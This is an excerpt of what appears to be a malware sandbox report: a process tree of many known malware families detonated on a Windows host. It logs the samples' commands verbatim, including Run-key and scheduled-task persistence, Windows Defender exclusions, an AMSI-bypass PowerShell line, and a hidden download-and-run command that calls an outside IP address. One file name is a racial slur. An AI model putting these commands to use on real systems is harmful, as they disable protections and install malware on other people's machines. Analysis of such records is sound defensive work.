      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:2996
  - - C:\Users\Admin\AppData\Local\Temp\proxyt.exe
      "C:\Users\Admin\AppData\Local\Temp\proxyt.exe"
      4⤵
      Executes dropped EXE
      PID:616
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\Local\Temp\proxyt.exe > nul
        5⤵
        
        PID:4264
- - C:\Users\Admin\AppData\Local\Temp\1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe
    "C:\Users\Admin\AppData\Local\Temp\1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1028
- - C:\Users\Admin\AppData\Local\Temp\5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe
    "C:\Users\Admin\AppData\Local\Temp\5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2016
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      PID:3912
- - C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe
    "C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1488
- - C:\Users\Admin\AppData\Local\Temp\DanaBot.exe
    "C:\Users\Admin\AppData\Local\Temp\DanaBot.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1964
  - - C:\Windows\SysWOW64\regsvr32.exe
      C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Local\Temp\DanaBot.dll f1 C:\Users\Admin\AppData\Local\Temp\DanaBot.exe@1964
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1384
    - - C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\DanaBot.dll,f0
        5⤵
        Blocklisted process makes network request
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2760
- - C:\Users\Admin\AppData\Local\Temp\Discord Nitro Generator and Checker.exe
    "C:\Users\Admin\AppData\Local\Temp\Discord Nitro Generator and Checker.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:808
- - C:\Users\Admin\AppData\Local\Temp\2020.exe
    "C:\Users\Admin\AppData\Local\Temp\2020.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:896
  - - C:\Users\Admin\AppData\Local\Temp\2020.exe
      "C:\Users\Admin\AppData\Local\Temp\2020.exe"
      4⤵
      Executes dropped EXE
      PID:2124
  - - C:\Users\Admin\AppData\Local\Temp\2020.exe
      "C:\Users\Admin\AppData\Local\Temp\2020.exe"
      4⤵
      Executes dropped EXE
      PID:2864
  - - C:\Users\Admin\AppData\Local\Temp\2020.exe
      "C:\Users\Admin\AppData\Local\Temp\2020.exe"
      4⤵
      Executes dropped EXE
      PID:2716
  - - C:\Users\Admin\AppData\Local\Temp\2020.exe
      "C:\Users\Admin\AppData\Local\Temp\2020.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:988
- - C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe
    "C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2936
  - - C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe
      "C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe"
      4⤵
      PID:5020
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\GWXUD.bat" "
        5⤵
        
        PID:2888
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "skypee" /t REG_SZ /d "C:\Windows\Skypee\skypee.exe" /f
        6⤵
        
        PID:5644
    - - C:\Windows\Skypee\skypee.exe
        
        "C:\Windows\Skypee\skypee.exe"
        5⤵
        
        PID:3768
      - C:\Windows\Skypee\skypee.exe
        
        "C:\Windows\Skypee\skypee.exe"
        6⤵
        
        PID:2060
      - C:\Windows\Skypee\skypee.exe
        
        "C:\Windows\Skypee\skypee.exe"
        6⤵
        
        PID:6052
        
        C:\Windows\syswow64\svchost.exe
        
        C:\Windows\syswow64\svchost.exe
        7⤵
        
        PID:208
- - C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe
    "C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - outlook_office_path
    - outlook_win_path
    PID:1864
- - C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe
    "C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3040
- - C:\Users\Admin\AppData\Local\Temp\goofy.exe
    "C:\Users\Admin\AppData\Local\Temp\goofy.exe"
    3⤵
    - Executes dropped EXE
    PID:2316
  - - C:\Windows\System32\attrib.exe
      "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\sdsdasd"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:5560
  - - C:\Windows\System32\attrib.exe
      "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\sdsdasd\$77bloody_was_here.exe"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:3592
  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpAD4F.tmp.bat""
      4⤵
      PID:8808
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:8984
    - - C:\Users\Admin\AppData\Roaming\sdsdasd\$77bloody_was_here.exe
        
        "C:\Users\Admin\AppData\Roaming\sdsdasd\$77bloody_was_here.exe"
        5⤵
        
        PID:3112
      - C:\Windows\system32\schtasks.exe
        
        "schtasks.exe" /query /TN $77bloody_was_here.exe
        6⤵
        
        PID:5552
      - C:\Windows\system32\schtasks.exe
        
        "schtasks.exe" /Create /SC ONCE /TN "$77bloody_was_here.exe" /TR "C:\Users\Admin\AppData\Roaming\sdsdasd\$77bloody_was_here.exe \"\$77bloody_was_here.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3576
      - C:\Windows\system32\schtasks.exe
        
        "schtasks.exe" /query /TN $77bloody_was_here.exe
        6⤵
        
        PID:7520
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7948
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "bloody_was_here_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4992
- - C:\Users\Admin\AppData\Local\Temp\FutureClient.exe
    "C:\Users\Admin\AppData\Local\Temp\FutureClient.exe"
    3⤵
    - Executes dropped EXE
    PID:2956
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:2744
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2876
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 556
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2376
- - C:\Users\Admin\AppData\Local\Temp\nigga.exe
    "C:\Users\Admin\AppData\Local\Temp\nigga.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2828
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\nigga.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:376
  - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
      4⤵
      PID:912
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5136
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\5bL3uM03lwMc.bat" "
        5⤵
        
        PID:5628
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        6⤵
        
        PID:4420
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3208
      - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        6⤵
        
        PID:4380
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4600
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\qt0k0Sdu7IVY.bat" "
        7⤵
        
        PID:3868
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        8⤵
        
        PID:4172
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5576
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        8⤵
        
        PID:9016
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7088
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nY5lEeI4q5DJ.bat" "
        9⤵
        
        PID:204
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        10⤵
        
        PID:7544
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7604
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        10⤵
        
        PID:7212
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5832
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\tMW2bKedNgAo.bat" "
        11⤵
        
        PID:7952
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        12⤵
        
        PID:9176
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:9120
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        12⤵
        
        PID:7568
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3344
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\HwVC8YbyZUv4.bat" "
        13⤵
        
        PID:8800
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        14⤵
        
        PID:8500
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6424
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        14⤵
        
        PID:7276
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        15⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4332
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Ex5IpiVxYQUw.bat" "
        15⤵
        
        PID:4016
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        16⤵
        
        PID:6332
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:8116
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        16⤵
        
        PID:7148
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        17⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8784
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\RcofJF04iQOv.bat" "
        17⤵
        
        PID:8792
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        18⤵
        
        PID:2108
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7732
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        18⤵
        
        PID:4684
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        19⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7472
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\j309Yf3igW2C.bat" "
        19⤵
        
        PID:8100
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        20⤵
        
        PID:4440
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:408
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        20⤵
        
        PID:5044
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        21⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8936
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\2f6LOb1AHb4E.bat" "
        21⤵
        
        PID:4708
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        22⤵
        
        PID:7208
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2720
- - C:\Users\Admin\AppData\Local\Temp\amadey.exe
    "C:\Users\Admin\AppData\Local\Temp\amadey.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:484
  - - C:\ProgramData\a5410c88f1\bween.exe
      "C:\ProgramData\a5410c88f1\bween.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1600
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\a5410c88f1\
        5⤵
        
        PID:2228
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\a5410c88f1\
        6⤵
        
        PID:2940
- - C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe
    "C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    PID:1704
- - C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe
    "C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1788
  - - C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe
      "C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe"
      4⤵
      Executes dropped EXE
      PID:864
    - - C:\Users\Admin\AppData\Local\Temp\setup-26030245461.exe
        
        C:\Users\Admin\AppData\Local\Temp\\setup-26030245461.exe
        5⤵
        
        PID:3844
- - C:\Users\Admin\AppData\Local\Temp\CrimsonRAT.exe
    "C:\Users\Admin\AppData\Local\Temp\CrimsonRAT.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:1492
  - - C:\ProgramData\Hdlharas\dlrarhsiva.exe
      "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
      4⤵
      PID:3100
- - C:\Users\Admin\AppData\Local\Temp\Backdoor.Win32.Rbot.aal.exe
    "C:\Users\Admin\AppData\Local\Temp\Backdoor.Win32.Rbot.aal.exe"
    3⤵
    - Executes dropped EXE
    PID:2384
- - C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe
    "C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe"
    3⤵
    - Executes dropped EXE
    PID:1820
  - - C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe
      "C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe"
      4⤵
      Executes dropped EXE
      PID:1244
- - C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe
    "C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2944
  - - C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe
      "C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:2080
- - C:\Users\Admin\AppData\Local\Temp\Discord Free Nitros.exe
    "C:\Users\Admin\AppData\Local\Temp\Discord Free Nitros.exe"
    3⤵
    - Executes dropped EXE
    PID:2632
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "'Minecraft"' /tr "'C:\Users\Admin\AppData\Roaming\Minecraft.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5932
  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp5A12.tmp.bat""
      4⤵
      PID:5632
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:5336
    - - C:\Users\Admin\AppData\Roaming\Minecraft.exe
        
        "C:\Users\Admin\AppData\Roaming\Minecraft.exe"
        5⤵
        
        PID:1716
- - C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe
    "C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1252
- - C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr
    "C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr" /S
    3⤵
    - Modifies firewall policy service
    - UAC bypass
    - Windows security bypass
    - Executes dropped EXE
    - Windows security modification
    - Checks whether UAC is enabled
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - System policy modification
    PID:992
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\love.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\love.exe" /S
      4⤵
      PID:1988
    - - C:\Users\Admin\AppData\Local\server.exe
        
        "C:\Users\Admin\AppData\Local\server.exe"
        5⤵
        
        PID:984
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\ForYou.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ForYou.exe" /S
      4⤵
      PID:5192
- - C:\Users\Admin\AppData\Local\Temp\Lokibot.exe
    "C:\Users\Admin\AppData\Local\Temp\Lokibot.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2804
  - - C:\Users\Admin\AppData\Local\Temp\Lokibot.exe
      "C:\Users\Admin\AppData\Local\Temp\Lokibot.exe"
      4⤵
      PID:216
- - C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
    3⤵
    PID:4064
  - - C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"
      4⤵
      PID:5672
    - - C:\Users\Admin\AppData\Local\Temp\a\roblox_protected.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\roblox_protected.exe"
        5⤵
        
        PID:4956
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\a\roblox_protected.exe"
        6⤵
        
        PID:4452
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        7⤵
        
        PID:5304
    - - C:\Users\Admin\AppData\Local\Temp\a\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\setup.exe"
        5⤵
        
        PID:5900
    - - C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe"
        5⤵
        
        PID:3492
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8348
      - C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe"
        6⤵
        
        PID:8368
    - - C:\Users\Admin\AppData\Local\Temp\a\VixenLoader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\VixenLoader.exe"
        5⤵
        
        PID:1576
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\taskhostw.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4784
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhostw.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3876
      - C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpB8F3.tmp.bat""
        6⤵
        
        PID:780
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:5952
    - - C:\Users\Admin\AppData\Local\Temp\a\x.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\x.exe"
        5⤵
        
        PID:6924
    - - C:\Users\Admin\AppData\Local\Temp\a\random.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\random.exe"
        5⤵
        
        PID:6288
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn 3ryB8ma9Eji /tr "mshta C:\Users\Admin\AppData\Local\Temp\02pgjeAcd.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        
        PID:2000
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn 3ryB8ma9Eji /tr "mshta C:\Users\Admin\AppData\Local\Temp\02pgjeAcd.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7116
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\02pgjeAcd.hta
        6⤵
        
        PID:8372
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8LRO28MWPOVJ1XAEN1PMO2DVQB6QZ7VZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6756
        
        C:\Users\Admin\AppData\Local\Temp8LRO28MWPOVJ1XAEN1PMO2DVQB6QZ7VZ.EXE
        
        "C:\Users\Admin\AppData\Local\Temp8LRO28MWPOVJ1XAEN1PMO2DVQB6QZ7VZ.EXE"
        8⤵
        
        PID:3672
    - - C:\Users\Admin\AppData\Local\Temp\a\si.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\si.exe"
        5⤵
        
        PID:6084
    - - C:\Users\Admin\AppData\Local\Temp\a\CrSpoof.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\CrSpoof.exe"
        5⤵
        
        PID:8460
      - C:\Windows\system32\cmd.exe
        
        cmd /c "botnet.bat"
        6⤵
        
        PID:2636
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "& { Add-MpPreference -ExclusionPath \"$env:TEMP\"; Add-MpPreference -ExclusionPath \"$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\" }"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "$amsi=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); $field=$amsi.GetField('amsiInitFailed','NonPublic,Static'); $field.SetValue($null,$true);"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4636
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 0.1 /nobreak
        7⤵
        Delays execution with timeout.exe
        
        PID:5356
  - - C:\ProgramData\Synaptics\Synaptics.exe
      "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
      4⤵
      PID:5340
